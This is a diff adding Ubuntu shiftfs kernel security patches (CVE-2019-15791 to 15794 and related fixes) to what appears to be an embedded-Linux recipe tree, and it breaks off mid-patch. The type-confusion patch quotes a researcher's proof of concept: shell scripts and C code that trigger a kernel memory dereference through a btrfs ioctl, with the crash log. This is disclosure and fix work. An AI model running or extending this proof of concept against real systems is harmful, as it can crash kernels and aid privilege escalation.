+[ 183.571102] RAX: 6b6b6b6b6b6b6b6b RBX: ffff93f1fb7908a8 RCX: 7800000000000000
+[ 183.573362] RDX: 8000000000000025 RSI: ffff93f1fb792208 RDI: ffff93f1f69fa400
+[ 183.575655] RBP: ffffae48007c3d60 R08: ffff93f1fb792208 R09: 0000000000000000
+[ 183.577893] R10: ffff93f1fb790888 R11: 00007f1d01d10000 R12: ffff93f1fb7908b0
+[ 183.580166] R13: ffff93f1f69f9900 R14: ffff93f1fb792208 R15: ffff93f22f102e40
+[ 183.582411] FS: 00007f1d01cd1540(0000) GS:ffff93f237a40000(0000) knlGS:0000000000000000
+[ 183.584960] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
+[ 183.586796] CR2: 00007f1d01bc4c10 CR3: 0000000242726001 CR4: 0000000000360ee0
+[ 183.589035] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
+[ 183.591279] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
+=======================================
+
+Disassembly of surrounding code:
+
+55 push rbp
+4889E5 mov rbp,rsp
+4157 push r15
+4156 push r14
+4155 push r13
+4154 push r12
+488B87C8000000 mov rax,[rdi+0xc8]
+4C8B6810 mov r13,[rax+0x10]
+498B4528 mov rax,[r13+0x28]
+4883786000 cmp qword [rax+0x60],byte +0x0 <-- GPF HERE
+0F8497000000 jz near 0xcc
+4989FC mov r12,rdi
+4989F6 mov r14,rsi
+
+This is an attempted dereference of 0x6b6b6b6b6b6b6b6b, which is POISON_FREE; I
+think this corresponds to the load of "realfile->f_op->mmap" in the source code.
+
+Reported-by: Jann Horn <jannh@google.com>
+Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
+
+CVE-2019-15791
+
+Acked-by: Tyler Hicks <tyhicks@canonical.com>
+Signed-off-by: Stefan Bader <stefan.bader@canonical.com>
+---
+ fs/shiftfs.c | 35 +++++++++++++++++++++--------------
+ 1 file changed, 21 insertions(+), 14 deletions(-)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index a21cb473e000..4535d1787703 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -1385,8 +1385,7 @@ static inline bool is_btrfs_snap_ioctl(int cmd)
+ 	return false;
+ }
+ 
+-static int shiftfs_btrfs_ioctl_fd_restore(int cmd, struct fd lfd, int fd,
+-					  void __user *arg,
++static int shiftfs_btrfs_ioctl_fd_restore(int cmd, int fd, void __user *arg,
+ 					  struct btrfs_ioctl_vol_args *v1,
+ 					  struct btrfs_ioctl_vol_args_v2 *v2)
+ {
+@@ -1400,7 +1399,6 @@ static int shiftfs_btrfs_ioctl_fd_restore(int cmd, struct fd lfd, int fd,
+ 	else
+ 		ret = copy_to_user(arg, v2, sizeof(*v2));
+ 
+-	fdput(lfd);
+ 	__close_fd(current->files, fd);
+ 	kfree(v1);
+ 	kfree(v2);
+@@ -1411,11 +1409,11 @@ static int shiftfs_btrfs_ioctl_fd_restore(int cmd, struct fd lfd, int fd,
+ static int shiftfs_btrfs_ioctl_fd_replace(int cmd, void __user *arg,
+ 					  struct btrfs_ioctl_vol_args **b1,
+ 					  struct btrfs_ioctl_vol_args_v2 **b2,
+-					  struct fd *lfd,
+ 					  int *newfd)
+ {
+ 	int oldfd, ret;
+ 	struct fd src;
++	struct fd lfd = {};
+ 	struct btrfs_ioctl_vol_args *v1 = NULL;
+ 	struct btrfs_ioctl_vol_args_v2 *v2 = NULL;
+ 
+@@ -1440,18 +1438,28 @@ static int shiftfs_btrfs_ioctl_fd_replace(int cmd, void __user *arg,
+ 	if (!src.file)
+ 		return -EINVAL;
+ 
+-	ret = shiftfs_real_fdget(src.file, lfd);
+-	fdput(src);
+-	if (ret)
++	ret = shiftfs_real_fdget(src.file, &lfd);
++	if (ret) {
++		fdput(src);
+ 		return ret;
++	}
++
++	/*
++	 * shiftfs_real_fdget() does not take a reference to lfd.file, so
++	 * take a reference here to offset the one which will be put by
++	 * __close_fd(), and make sure that reference is put on fdput(lfd).
++	 */
++	get_file(lfd.file);
++	lfd.flags |= FDPUT_FPUT;
++	fdput(src);
+ 
+-	*newfd = get_unused_fd_flags(lfd->file->f_flags);
++	*newfd = get_unused_fd_flags(lfd.file->f_flags);
+ 	if (*newfd < 0) {
+-		fdput(*lfd);
++		fdput(lfd);
+ 		return *newfd;
+ 	}
+ 
+-	fd_install(*newfd, lfd->file);
++	fd_install(*newfd, lfd.file);
+ 
+ 	if (cmd == BTRFS_IOC_SNAP_CREATE) {
+ 		v1->fd = *newfd;
+@@ -1464,7 +1472,7 @@ static int shiftfs_btrfs_ioctl_fd_replace(int cmd, void __user *arg,
+ 	}
+ 
+ 	if (ret)
+-		shiftfs_btrfs_ioctl_fd_restore(cmd, *lfd, *newfd, arg, v1, v2);
++		shiftfs_btrfs_ioctl_fd_restore(cmd, *newfd, arg, v1, v2);
+ 
+ 	return ret;
+ }
+@@ -1478,13 +1486,12 @@ static long shiftfs_real_ioctl(struct file *file, unsigned int cmd,
+ 	int newfd = -EBADF;
+ 	long err = 0, ret = 0;
+ 	void __user *argp = (void __user *)arg;
+-	struct fd btrfs_lfd = {};
+ 	struct super_block *sb = file->f_path.dentry->d_sb;
+ 	struct btrfs_ioctl_vol_args *btrfs_v1 = NULL;
+ 	struct btrfs_ioctl_vol_args_v2 *btrfs_v2 = NULL;
+ 
+ 	ret = shiftfs_btrfs_ioctl_fd_replace(cmd, argp, &btrfs_v1, &btrfs_v2,
+-					     &btrfs_lfd, &newfd);
++					     &newfd);
+ 	if (ret < 0)
+ 		return ret;
+ 
+@@ -1507,7 +1514,7 @@ static long shiftfs_real_ioctl(struct file *file, unsigned int cmd,
+ 	fdput(lowerfd);
+ 
+ out_restore:
+-	err = shiftfs_btrfs_ioctl_fd_restore(cmd, btrfs_lfd, newfd, argp,
++	err = shiftfs_btrfs_ioctl_fd_restore(cmd, newfd, argp,
+ 					     btrfs_v1, btrfs_v2);
+ 	if (!ret)
+ 		ret = err;
+-- 
+2.20.1
+

--- a/recipes-kernel/linux/linux-vanilla/4.19/0017-UBUNTU-SAUCE-shiftfs-prevent-type-confusion.patch
+++ b/recipes-kernel/linux/linux-vanilla/4.19/0017-UBUNTU-SAUCE-shiftfs-prevent-type-confusion.patch
@@ -1,0 +1,209 @@
+From 6eaf990956a7e332f89add4f195a9bc2e120c5e7 Mon Sep 17 00:00:00 2001
+From: Christian Brauner <christian.brauner@ubuntu.com>
+Date: Fri, 1 Nov 2019 14:19:16 +0100
+Subject: [PATCH 17/23] UBUNTU: SAUCE: shiftfs: prevent type confusion
+
+BugLink: https://bugs.launchpad.net/bugs/1850867
+
+Verify filesystem type in shiftfs_real_fdget().
+
+Quoting Jann Horn:
+ #################### Bug 2: Type confusion ####################
+
+ shiftfs_btrfs_ioctl_fd_replace() calls fdget(oldfd), then without further checks
+ passes the resulting file* into shiftfs_real_fdget(), which does this:
+
+ static int shiftfs_real_fdget(const struct file *file, struct fd *lowerfd)
+ {
+  struct shiftfs_file_info *file_info = file->private_data;
+  struct file *realfile = file_info->realfile;
+
+  lowerfd->flags = 0;
+  lowerfd->file = realfile;
+
+  /* Did the flags change since open? */
+  if (unlikely(file->f_flags & ~lowerfd->file->f_flags))
+   return shiftfs_change_flags(lowerfd->file, file->f_flags);
+
+  return 0;
+ }
+
+ file->private_data is a void* that points to a filesystem-dependent type; and
+ some filesystems even use it to store a type-cast number instead of a pointer.
+ The implicit cast to a "struct shiftfs_file_info *" can therefore be a bad cast.
+
+ As a PoC, here I'm causing a type confusion between struct shiftfs_file_info
+ (with ->realfile at offset 0x10) and struct mm_struct (with vmacache_seqnum at
+ offset 0x10), and I use that to cause a memory dereference somewhere around
+ 0x4242:
+
+ =======================================
+ user@ubuntu1910vm:~/shiftfs_confuse$ cat run.sh
+ #!/bin/sh
+ sync
+ unshare -mUr ./run2.sh
+ user@ubuntu1910vm:~/shiftfs_confuse$ cat run2.sh
+ #!/bin/sh
+ set -e
+
+ mkdir -p mnt/tmpfs
+ mkdir -p mnt/shiftfs
+ mount -t tmpfs none mnt/tmpfs
+ mount -t shiftfs -o mark,passthrough=2 mnt/tmpfs mnt/shiftfs
+ mount|grep shift
+ gcc -o ioctl ioctl.c -Wall
+ ./ioctl
+ user@ubuntu1910vm:~/shiftfs_confuse$ cat ioctl.c
+ #include <sys/ioctl.h>
+ #include <fcntl.h>
+ #include <err.h>
+ #include <unistd.h>
+ #include <linux/btrfs.h>
+ #include <sys/mman.h>
+
+ int main(void) {
+   // make our vmacache sequence number something like 0x4242
+   for (int i=0; i<0x4242; i++) {
+     void *x = mmap((void*)0x100000000UL, 0x1000, PROT_READ,
+         MAP_ANONYMOUS|MAP_PRIVATE, -1, 0);
+     if (x == MAP_FAILED) err(1, "mmap vmacache seqnum");
+     munmap(x, 0x1000);
+   }
+
+   int root = open("mnt/shiftfs", O_RDONLY);
+   if (root == -1) err(1, "open shiftfs root");
+   int foofd = open("/proc/self/environ", O_RDONLY);
+   if (foofd == -1) err(1, "open foofd");
+   // trigger the confusion
+   struct btrfs_ioctl_vol_args iocarg = {
+     .fd = foofd
+   };
+   ioctl(root, BTRFS_IOC_SNAP_CREATE, &iocarg);
+ }
+ user@ubuntu1910vm:~/shiftfs_confuse$ ./run.sh
+ none on /home/user/shiftfs_confuse/mnt/tmpfs type tmpfs (rw,relatime,uid=1000,gid=1000)
+ /home/user/shiftfs_confuse/mnt/tmpfs on /home/user/shiftfs_confuse/mnt/shiftfs type shiftfs (rw,relatime,mark,passthrough=2)
+ [ 348.103005] BUG: unable to handle page fault for address: 0000000000004289
+ [ 348.105060] #PF: supervisor read access in kernel mode
+ [ 348.106573] #PF: error_code(0x0000) - not-present page
+ [ 348.108102] PGD 0 P4D 0
+ [ 348.108871] Oops: 0000 [#1] SMP PTI
+ [ 348.109912] CPU: 6 PID: 2192 Comm: ioctl Not tainted 5.3.0-19-generic #20-Ubuntu
+ [ 348.112109] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.12.0-1 04/01/2014
+ [ 348.114460] RIP: 0010:shiftfs_real_ioctl+0x22e/0x410 [shiftfs]
+ [ 348.116166] Code: 38 44 89 ff e8 43 91 01 d3 49 89 c0 49 83 e0 fc 0f 84 ce 01 00 00 49 8b 90 c8 00 00 00 41 8b 70 40 48 8b 4a 10 89 c2 83 e2 01 <8b> 79 40 48 89 4d b8 89 f8 f7 d0 85 f0 0f 85 e8 00 00 00 85 d2 75
+ [ 348.121578] RSP: 0018:ffffb1e7806ebdc8 EFLAGS: 00010246
+ [ 348.123097] RAX: ffff9ce6302ebcc0 RBX: ffff9ce6302e90c0 RCX: 0000000000004249
+ [ 348.125174] RDX: 0000000000000000 RSI: 0000000000008000 RDI: 0000000000000004
+ [ 348.127222] RBP: ffffb1e7806ebe30 R08: ffff9ce6302ebcc0 R09: 0000000000001150
+ [ 348.129288] R10: ffff9ce63680e840 R11: 0000000080010d00 R12: 0000000050009401
+ [ 348.131358] R13: 00007ffd87558310 R14: ffff9ce60cffca88 R15: 0000000000000004
+ [ 348.133421] FS: 00007f77fa842540(0000) GS:ffff9ce637b80000(0000) knlGS:0000000000000000
+ [ 348.135753] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
+ [ 348.137413] CR2: 0000000000004289 CR3: 000000026ff94001 CR4: 0000000000360ee0
+ [ 348.139451] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
+ [ 348.141516] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
+ [ 348.143545] Call Trace:
+ [ 348.144272] shiftfs_ioctl+0x65/0x76 [shiftfs]
+ [ 348.145562] do_vfs_ioctl+0x407/0x670
+ [ 348.146620] ? putname+0x4a/0x50
+ [ 348.147556] ksys_ioctl+0x67/0x90
+ [ 348.148514] __x64_sys_ioctl+0x1a/0x20
+ [ 348.149593] do_syscall_64+0x5a/0x130
+ [ 348.150658] entry_SYSCALL_64_after_hwframe+0x44/0xa9
+ [ 348.152108] RIP: 0033:0x7f77fa76767b
+ [ 348.153140] Code: 0f 1e fa 48 8b 05 15 28 0d 00 64 c7 00 26 00 00 00 48 c7 c0 ff ff ff ff c3 66 0f 1f 44 00 00 f3 0f 1e fa b8 10 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d e5 27 0d 00 f7 d8 64 89 01 48
+ [ 348.158466] RSP: 002b:00007ffd875582e8 EFLAGS: 00000217 ORIG_RAX: 0000000000000010
+ [ 348.160610] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f77fa76767b
+ [ 348.162644] RDX: 00007ffd87558310 RSI: 0000000050009401 RDI: 0000000000000003
+ [ 348.164680] RBP: 00007ffd87559320 R08: 00000000ffffffff R09: 0000000000000000
+ [ 348.167456] R10: 0000000000000000 R11: 0000000000000217 R12: 0000561c135ee100
+ [ 348.169530] R13: 00007ffd87559400 R14: 0000000000000000 R15: 0000000000000000
+ [ 348.171573] Modules linked in: shiftfs intel_rapl_msr intel_rapl_common kvm_intel kvm snd_hda_codec_generic irqbypass ledtrig_audio crct10dif_pclmul crc32_pclmul snd_hda_intel snd_hda_codec ghash_clmulni_intel snd_hda_core snd_hwdep aesni_intel aes_x86_64 snd_pcm crypto_simd cryptd glue_helper snd_seq_midi joydev snd_seq_midi_event snd_rawmidi snd_seq input_leds snd_seq_device snd_timer serio_raw qxl snd ttm drm_kms_helper mac_hid soundcore drm fb_sys_fops syscopyarea sysfillrect qemu_fw_cfg sysimgblt sch_fq_codel parport_pc ppdev lp parport virtio_rng ip_tables x_tables autofs4 hid_generic usbhid hid psmouse i2c_i801 ahci virtio_net lpc_ich libahci net_failover failover virtio_blk
+ [ 348.188617] CR2: 0000000000004289
+ [ 348.189586] ---[ end trace dad859a1db86d660 ]---
+ [ 348.190916] RIP: 0010:shiftfs_real_ioctl+0x22e/0x410 [shiftfs]
+ [ 348.193401] Code: 38 44 89 ff e8 43 91 01 d3 49 89 c0 49 83 e0 fc 0f 84 ce 01 00 00 49 8b 90 c8 00 00 00 41 8b 70 40 48 8b 4a 10 89 c2 83 e2 01 <8b> 79 40 48 89 4d b8 89 f8 f7 d0 85 f0 0f 85 e8 00 00 00 85 d2 75
+ [ 348.198713] RSP: 0018:ffffb1e7806ebdc8 EFLAGS: 00010246
+ [ 348.200226] RAX: ffff9ce6302ebcc0 RBX: ffff9ce6302e90c0 RCX: 0000000000004249
+ [ 348.202257] RDX: 0000000000000000 RSI: 0000000000008000 RDI: 0000000000000004
+ [ 348.204294] RBP: ffffb1e7806ebe30 R08: ffff9ce6302ebcc0 R09: 0000000000001150
+ [ 348.206324] R10: ffff9ce63680e840 R11: 0000000080010d00 R12: 0000000050009401
+ [ 348.208362] R13: 00007ffd87558310 R14: ffff9ce60cffca88 R15: 0000000000000004
+ [ 348.210395] FS: 00007f77fa842540(0000) GS:ffff9ce637b80000(0000) knlGS:0000000000000000
+ [ 348.212710] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
+ [ 348.214365] CR2: 0000000000004289 CR3: 000000026ff94001 CR4: 0000000000360ee0
+ [ 348.216409] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
+ [ 348.218349] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
+ Killed
+ user@ubuntu1910vm:~/shiftfs_confuse$
+
+Reported-by: Jann Horn <jannh@google.com>
+Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
+[ saf: adjustments for disco ]
+Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
+
+CVE-2019-15792
+
+Acked-by: Tyler Hicks <tyhicks@canonical.com>
+Signed-off-by: Stefan Bader <stefan.bader@canonical.com>
+---
+ fs/shiftfs.c | 35 ++++++++++++++++++++---------------
+ 1 file changed, 20 insertions(+), 15 deletions(-)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index 4535d1787703..2a53439ae9c6 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -1094,21 +1094,6 @@ static int shiftfs_change_flags(struct file *file, unsigned int flags)
+ 	return 0;
+ }
+ 
+-static int shiftfs_real_fdget(const struct file *file, struct fd *lowerfd)
+-{
+-	struct shiftfs_file_info *file_info = file->private_data;
+-	struct file *realfile = file_info->realfile;
+-
+-	lowerfd->flags = 0;
+-	lowerfd->file = realfile;
+-
+-	/* Did the flags change since open? */
+-	if (unlikely(file->f_flags & ~lowerfd->file->f_flags))
+-		return shiftfs_change_flags(lowerfd->file, file->f_flags);
+-
+-	return 0;
+-}
+-
+ static int shiftfs_open(struct inode *inode, struct file *file)
+ {
+ 	struct shiftfs_super_info *ssi = inode->i_sb->s_fs_info;
+@@ -1189,6 +1174,26 @@ static rwf_t shiftfs_iocb_to_rwf(struct kiocb *iocb)
+ 	return flags;
+ }
+ 
++static int shiftfs_real_fdget(const struct file *file, struct fd *lowerfd)
++{
++	struct shiftfs_file_info *file_info;
++	struct file *realfile;
++
++	if (file->f_op->open != shiftfs_open)
++		return -EINVAL;
++
++	file_info = file->private_data;
++	realfile = file_info->realfile;
++	lowerfd->flags = 0;
++	lowerfd->file = realfile;
++
++	/* Did the flags change since open? */
++	if (unlikely(file->f_flags & ~lowerfd->file->f_flags))
++		return shiftfs_change_flags(lowerfd->file, file->f_flags);
++
++	return 0;
++}
++
+ static ssize_t shiftfs_read_iter(struct kiocb *iocb, struct iov_iter *iter)
+ {
+ 	struct file *file = iocb->ki_filp;
+-- 
+2.20.1
+

--- a/recipes-kernel/linux/linux-vanilla/4.19/0018-UBUNTU-SAUCE-shiftfs-Correct-id-translation-for-lowe.patch
+++ b/recipes-kernel/linux/linux-vanilla/4.19/0018-UBUNTU-SAUCE-shiftfs-Correct-id-translation-for-lowe.patch
@@ -1,0 +1,134 @@
+From ba70889b574885ab1ffd8e44446b51ee99b8c8d9 Mon Sep 17 00:00:00 2001
+From: Seth Forshee <seth.forshee@canonical.com>
+Date: Fri, 1 Nov 2019 13:35:25 -0500
+Subject: [PATCH 18/23] UBUNTU: SAUCE: shiftfs: Correct id translation for
+ lower fs operations
+
+BugLink: https://bugs.launchpad.net/bugs/1850867
+
+Several locations which shift ids translate user/group ids before
+performing operations in the lower filesystem are translating
+them into init_user_ns, whereas they should be translated into
+the s_user_ns for the lower filesystem. This will result in using
+ids other than the intended ones in the lower fs, which will
+likely not map into the shifts s_user_ns.
+
+Change these sites to use shift_k[ug]id() to do a translation
+into the s_user_ns of the lower filesystem.
+
+Reported-by: Jann Horn <jannh@google.com>
+Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
+
+CVE-2019-15793
+
+Acked-by: Tyler Hicks <tyhicks@canonical.com>
+Signed-off-by: Stefan Bader <stefan.bader@canonical.com>
+---
+ fs/shiftfs.c | 43 +++++++++++++++++++++++--------------------
+ 1 file changed, 23 insertions(+), 20 deletions(-)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index 2a53439ae9c6..dbd0ebd51a2f 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -90,12 +90,27 @@ static inline void shiftfs_revert_object_creds(const struct cred *oldcred,
+ 	put_cred(newcred);
+ }
+ 
++static kuid_t shift_kuid(struct user_namespace *from, struct user_namespace *to,
++			 kuid_t kuid)
++{
++	uid_t uid = from_kuid(from, kuid);
++	return make_kuid(to, uid);
++}
++
++static kgid_t shift_kgid(struct user_namespace *from, struct user_namespace *to,
++			 kgid_t kgid)
++{
++	gid_t gid = from_kgid(from, kgid);
++	return make_kgid(to, gid);
++}
++
+ static int shiftfs_override_object_creds(const struct super_block *sb,
+ 					 const struct cred **oldcred,
+ 					 struct cred **newcred,
+ 					 struct dentry *dentry, umode_t mode,
+ 					 bool hardlink)
+ {
++	struct shiftfs_super_info *sbinfo = sb->s_fs_info;
+ 	kuid_t fsuid = current_fsuid();
+ 	kgid_t fsgid = current_fsgid();
+ 
+@@ -107,8 +122,8 @@ static int shiftfs_override_object_creds(const struct super_block *sb,
+ 		return -ENOMEM;
+ 	}
+ 
+-	(*newcred)->fsuid = KUIDT_INIT(from_kuid(sb->s_user_ns, fsuid));
+-	(*newcred)->fsgid = KGIDT_INIT(from_kgid(sb->s_user_ns, fsgid));
++	(*newcred)->fsuid = shift_kuid(sb->s_user_ns, sbinfo->userns, fsuid);
++	(*newcred)->fsgid = shift_kgid(sb->s_user_ns, sbinfo->userns, fsgid);
+ 
+ 	if (!hardlink) {
+ 		int err = security_dentry_create_files_as(dentry, mode,
+@@ -124,20 +139,6 @@ static int shiftfs_override_object_creds(const struct super_block *sb,
+ 	return 0;
+ }
+ 
+-static kuid_t shift_kuid(struct user_namespace *from, struct user_namespace *to,
+-			 kuid_t kuid)
+-{
+-	uid_t uid = from_kuid(from, kuid);
+-	return make_kuid(to, uid);
+-}
+-
+-static kgid_t shift_kgid(struct user_namespace *from, struct user_namespace *to,
+-			 kgid_t kgid)
+-{
+-	gid_t gid = from_kgid(from, kgid);
+-	return make_kgid(to, gid);
+-}
+-
+ static void shiftfs_copyattr(struct inode *from, struct inode *to)
+ {
+ 	struct user_namespace *from_ns = from->i_sb->s_user_ns;
+@@ -765,6 +766,7 @@ static int shiftfs_setattr(struct dentry *dentry, struct iattr *attr)
+ 	struct iattr newattr;
+ 	const struct cred *oldcred;
+ 	struct super_block *sb = dentry->d_sb;
++	struct shiftfs_super_info *sbinfo = sb->s_fs_info;
+ 	int err;
+ 
+ 	err = setattr_prepare(dentry, attr);
+@@ -772,8 +774,8 @@ static int shiftfs_setattr(struct dentry *dentry, struct iattr *attr)
+ 		return err;
+ 
+ 	newattr = *attr;
+-	newattr.ia_uid = KUIDT_INIT(from_kuid(sb->s_user_ns, attr->ia_uid));
+-	newattr.ia_gid = KGIDT_INIT(from_kgid(sb->s_user_ns, attr->ia_gid));
++	newattr.ia_uid = shift_kuid(sb->s_user_ns, sbinfo->userns, attr->ia_uid);
++	newattr.ia_gid = shift_kgid(sb->s_user_ns, sbinfo->userns, attr->ia_gid);
+ 
+ 	/*
+ 	 * mode change is for clearing setuid/setgid bits. Allow lower fs
+@@ -1352,6 +1354,7 @@ static int shiftfs_override_ioctl_creds(const struct super_block *sb,
+ 					const struct cred **oldcred,
+ 					struct cred **newcred)
+ {
++	struct shiftfs_super_info *sbinfo = sb->s_fs_info;
+ 	kuid_t fsuid = current_fsuid();
+ 	kgid_t fsgid = current_fsgid();
+ 
+@@ -1363,8 +1366,8 @@ static int shiftfs_override_ioctl_creds(const struct super_block *sb,
+ 		return -ENOMEM;
+ 	}
+ 
+-	(*newcred)->fsuid = KUIDT_INIT(from_kuid(sb->s_user_ns, fsuid));
+-	(*newcred)->fsgid = KGIDT_INIT(from_kgid(sb->s_user_ns, fsgid));
++	(*newcred)->fsuid = shift_kuid(sb->s_user_ns, sbinfo->userns, fsuid);
++	(*newcred)->fsgid = shift_kgid(sb->s_user_ns, sbinfo->userns, fsgid);
+ 
+ 	/* clear all caps to prevent bypassing capable() checks */
+ 	cap_clear((*newcred)->cap_bset);
+-- 
+2.20.1
+

--- a/recipes-kernel/linux/linux-vanilla/4.19/0019-UBUNTU-SAUCE-shiftfs-Restore-vm_file-value-when-lowe.patch
+++ b/recipes-kernel/linux/linux-vanilla/4.19/0019-UBUNTU-SAUCE-shiftfs-Restore-vm_file-value-when-lowe.patch
@@ -1,0 +1,64 @@
+From 64903e2159d5bd3b4ce12108559bd5c042382163 Mon Sep 17 00:00:00 2001
+From: Seth Forshee <seth.forshee@canonical.com>
+Date: Thu, 7 Nov 2019 10:08:24 -0600
+Subject: [PATCH 19/23] UBUNTU: SAUCE: shiftfs: Restore vm_file value when
+ lower fs mmap fails
+
+BugLink: https://bugs.launchpad.net/bugs/1850994
+
+shiftfs_mmap() overwrites vma->vm_file before calling the lower
+filesystem mmap but does not restore the original value on
+failure. This means it is giving a pointer to the lower fs file
+back to the caller with no reference, which is a bad practice.
+However, it does not lead to any issues with upstream kernels as
+no caller accesses vma->vm_file after call_mmap().
+
+With the aufs patches applied the story is different. Whereas
+mmap_region() previously fput a local variable containing the
+file it assigned to vm_file, it now calls vma_fput() which will
+fput vm_file, for which it has no reference, and the reference
+for the original vm_file is not put.
+
+Fix this by restoring vma->vm_file to the original value when the
+mmap call into the lower fs fails.
+
+CVE-2019-15794
+
+Reported-by: Jann Horn <jannh@google.com>
+Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
+Acked-by: Stefan Bader <stefan.bader@canonical.com>
+Acked-by: Tyler Hicks <tyhicks@canonical.com>
+Signed-off-by: Khalid Elmously <khalid.elmously@canonical.com>
+---
+ fs/shiftfs.c | 15 +++++++++++----
+ 1 file changed, 11 insertions(+), 4 deletions(-)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index dbd0ebd51a2f..bdb7daf1f542 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -1299,10 +1299,17 @@ static int shiftfs_mmap(struct file *file, struct vm_area_struct *vma)
+ 
+ 	shiftfs_file_accessed(file);
+ 
+-	if (ret)
+-		fput(realfile); /* Drop refcount from new vm_file value */
+-	else
+-		fput(file); /* Drop refcount from previous vm_file value */
++	if (ret) {
++		/*
++		 * Drop refcount from new vm_file value and restore original
++		 * vm_file value
++		 */
++		vma->vm_file = file;
++		fput(realfile);
++	} else {
++		/* Drop refcount from previous vm_file value */
++		fput(file);
++	}
+ 
+ 	return ret;
+ }
+-- 
+2.20.1
+

--- a/recipes-kernel/linux/linux-vanilla/4.19/0020-UBUNTU-SAUCE-shiftfs-setup-correct-s_maxbytes-limit.patch
+++ b/recipes-kernel/linux/linux-vanilla/4.19/0020-UBUNTU-SAUCE-shiftfs-setup-correct-s_maxbytes-limit.patch
@@ -1,0 +1,38 @@
+From 2f9db6e7beca68639039f58c062b79ea0ecbfaf4 Mon Sep 17 00:00:00 2001
+From: Christian Brauner <christian.brauner@ubuntu.com>
+Date: Wed, 23 Oct 2019 14:22:28 +0200
+Subject: [PATCH 20/23] UBUNTU: SAUCE: shiftfs: setup correct s_maxbytes limit
+
+BugLink: https://bugs.launchpad.net/bugs/1849482
+
+Set the s_maxbytes limit to MAX_LFS_FILESIZE.
+Currently shiftfs limits the maximum size for fallocate() needlessly
+causing calls such as fallocate --length 2GB ./file to fail. This
+limitation is arbitrary since it's not caused by the underlay but
+rather by shiftfs itself capping the s_maxbytes. This causes bugs such
+as the one reported in [1].
+
+[1]: https://github.com/lxc/lxd/issues/6333
+Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
+Acked-by: Stefan Bader <stefan.bader@canonical.com>
+Acked-by: Connor Kuehl <connor.kuehl@canonical.com>
+Signed-off-by: Khalid Elmously <khalid.elmously@canonical.com>
+---
+ fs/shiftfs.c | 1 +
+ 1 file changed, 1 insertion(+)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index bdb7daf1f542..618fa40962c7 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -2083,6 +2083,7 @@ static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
+ 	inode->i_private = dentry->d_inode;
+ 
+ 	sb->s_magic = SHIFTFS_MAGIC;
++	sb->s_maxbytes = MAX_LFS_FILESIZE;
+ 	sb->s_op = &shiftfs_super_ops;
+ 	sb->s_xattr = shiftfs_xattr_handlers;
+ 	sb->s_d_op = &shiftfs_dentry_ops;
+-- 
+2.20.1
+

--- a/recipes-kernel/linux/linux-vanilla/4.19/0021-UBUNTU-SAUCE-shiftfs-drop-CAP_SYS_RESOURCE-from-effe.patch
+++ b/recipes-kernel/linux/linux-vanilla/4.19/0021-UBUNTU-SAUCE-shiftfs-drop-CAP_SYS_RESOURCE-from-effe.patch
@@ -1,0 +1,66 @@
+From 4267ff73b6d29f1b3d68e4e9517a18f9eeec1d17 Mon Sep 17 00:00:00 2001
+From: Christian Brauner <christian.brauner@ubuntu.com>
+Date: Wed, 23 Oct 2019 14:23:50 +0200
+Subject: [PATCH 21/23] UBUNTU: SAUCE: shiftfs: drop CAP_SYS_RESOURCE from
+ effective capabilities
+
+BugLink: https://bugs.launchpad.net/bugs/1849483
+
+Currently shiftfs allows to exceed project quota and reserved space on
+e.g. ext2. See [1] and especially [2] for a bug report. This is very
+much not what we want. Quotas and reserverd space settings set on the
+host need to respected. The cause for this issue is overriding the
+credentials with the superblock creator's credentials whenever we
+perform operations such as fallocate() or writes while retaining
+CAP_SYS_RESOURCE.
+
+The fix is to drop CAP_SYS_RESOURCE from the effective capability set
+after we have made a copy of the superblock creator's credential at
+superblock creation time. This very likely gives us more security than
+we had before and the regression potential seems limited. I would like
+to try this apporach first before coming up with something potentially
+more sophisticated. I don't see why CAP_SYS_RESOURCE should become a
+limiting factor in most use-cases.
+
+[1]: https://github.com/lxc/lxd/issues/6333
+[2]: https://github.com/lxc/lxd/issues/6333#issuecomment-545154838
+Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
+Acked-by: Stefan Bader <stefan.bader@canonical.com>
+Acked-by: Connor Kuehl <connor.kuehl@canonical.com>
+Signed-off-by: Khalid Elmously <khalid.elmously@canonical.com>
+---
+ fs/shiftfs.c | 8 ++++++--
+ 1 file changed, 6 insertions(+), 2 deletions(-)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index 618fa40962c7..7035123689e2 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -1977,6 +1977,7 @@ static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
+ 	sb->s_flags |= SB_POSIXACL;
+ 
+ 	if (sbinfo->mark) {
++		struct cred *cred_tmp;
+ 		struct super_block *lower_sb = path.mnt->mnt_sb;
+ 
